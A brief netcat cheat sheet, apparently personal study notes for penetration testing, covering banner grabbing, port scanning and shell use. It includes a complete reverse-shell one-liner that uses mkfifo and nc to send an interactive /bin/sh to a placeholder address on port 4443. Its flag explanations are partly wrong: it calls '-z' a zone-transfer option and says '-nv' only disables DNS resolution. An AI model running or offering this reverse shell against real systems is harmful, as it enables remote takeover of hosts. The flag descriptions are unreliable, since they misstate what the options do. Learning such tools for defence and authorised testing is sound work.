Netcat

• TCP/IP Swiss Army Knife - we will use this tool alot

• Can scan ports but can also be used for:

  • chatting between two computers

  • banner grabbing

  • file transfer

  • for shell

• Traffic is not encrypted ( unless you use ncat)

Banner Grabbing

nc -v google.com 80

it will connect nc to google server if port 80 is open and then we can query it manually for example

after connecting , we can use http parameters like GET, HEAD, OPTIONS etc to send the request and server will return the response

Netcat without -e flag

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f

Port Scanning

 nc -nv -w 1 -z 192.168.1.1 1-1024
 
-nv = doesn't resolve dns
-w 1 = sets timeout to 1 second
-z = specifies zone transfer
-u = UDP mode (can be unreliable)